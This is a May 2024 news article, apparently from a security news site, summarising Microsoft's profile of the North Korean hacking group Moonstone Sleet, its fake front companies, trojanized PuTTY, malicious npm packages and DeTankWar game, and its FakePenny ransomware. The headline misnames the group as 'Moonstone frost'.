Microsoft warns of ‘Moonstone frost’ in North Korea

Cyber ​​warfare/nation state attacks, fraud management and cybercrime

Pyongyang threat actor is looking for money and information

Prajeet Nair (@prajeetspeaks) •
May 28, 2024

Microsoft warns of 'Moonstone frost' in North Korea
Another day in workers’ paradise (Image: Shutterstock)

A North Korean hacking group wants to make money for the cash-strapped regime in Pyongyang and conduct cyber espionage, Microsoft researchers say in a profile of a group they follow as “Moonstone Sleet.”

Also see: Live webinar | Digital doppelgängers: the double faces of deepfake technology

The hacking group, previously tracked by Redmond as Storm-1789, has pursued software development employment – an issue that Western companies have grappled with alongside the rise of remote work and staffing agencies. U.S. federal prosecutors earlier this month unsealed charges against two individuals for allegedly acting as intermediaries between North Korean nationals and U.S. companies (see: US FBI busts scamming of North Korean IT workers).

Moonstone Sleet hackers have deployed a new custom ransomware variant that Microsoft calls ‘FakePenny’. The group is hardly the first Hermit Kingdom hacking group to maliciously encrypt files and demand extortion, but the numbers appear higher than previous examples. In one case, the hackers demanded $6.6 million in bitcoin, Microsoft said.

North Korea has an established history of hacking for profit. The United Nations suspects that the country carried out 58 cyber attacks between 2017 and 2023 to steal about $3 billion for the further development of weapons of mass destruction.

Moonstone Sleet’s arsenal of tactics, techniques and procedures exhibits significant overlap with those of other North Korean threat actors. Initially, the actor showed similarities to Diamond Sleet, also known as the Lazarus Group, by reusing code and techniques to gain access to organizations.

Moonstone Sleet has since developed its own infrastructure and attacks, establishing itself as a distinctive, well-resourced threat actor.

In early August, Moonstone Sleet began delivering a Trojan version of PuTTY via platforms such as LinkedIn and Telegram. The actor sent targets a .zip archive containing a Trojan version of putty.exe and a URL with an IP address and password. When users entered this data, the application decrypted and executed an embedded payload, initiating a multi-phase malware execution process.

Moonstone Sleet also targeted potential victims through malicious npm packages delivered through freelancing websites or platforms such as LinkedIn. In one case, the actor used a fake company to ship .zip files containing a malicious npm package disguised as a technical skills assessment. This packet connected to an actor-controlled IP address and dropped additional malicious payloads such as SplitLoader.

Moonstone Sleet infected devices using a malicious tank game called DeTankWar. The actor approached targets via messaging platforms or email, posing as a game developer seeking investment or developer support. Once launched, the game loaded additional malicious DLLs and ran the custom malware loader YouieLoad, which enabled network and user detection and collection of browser data.

The threat actor has targeted sectors such as software and information technology, education and the defense industrial base. The group compromised a defense technology company and a drone technology company, using stolen credentials and intellectual property to achieve its objectives.

The operators behind Moonstone Sleet have created several fake companies, which mimic software development and IT services, especially in the areas of blockchain and AI.

It used fake companies, such as StarGlow Ventures and CCWaterfall, to contact potential targets through email campaigns and social media.

From January to April, North Korean hackers used StarGlow Ventures to pose as a legitimate software development company, targeting organizations in the education and software development sectors.

The actor used a custom domain, fake staff and social media accounts to add legitimacy.

In a similar campaign, Moonstone Sleet used CCWaterfall, a so-called IT consulting organization, to email higher education organizations claiming to be hiring new developers or looking for business partnership opportunities. It also used the CCWaterfall branding to distribute DeTankWar.

Back To Top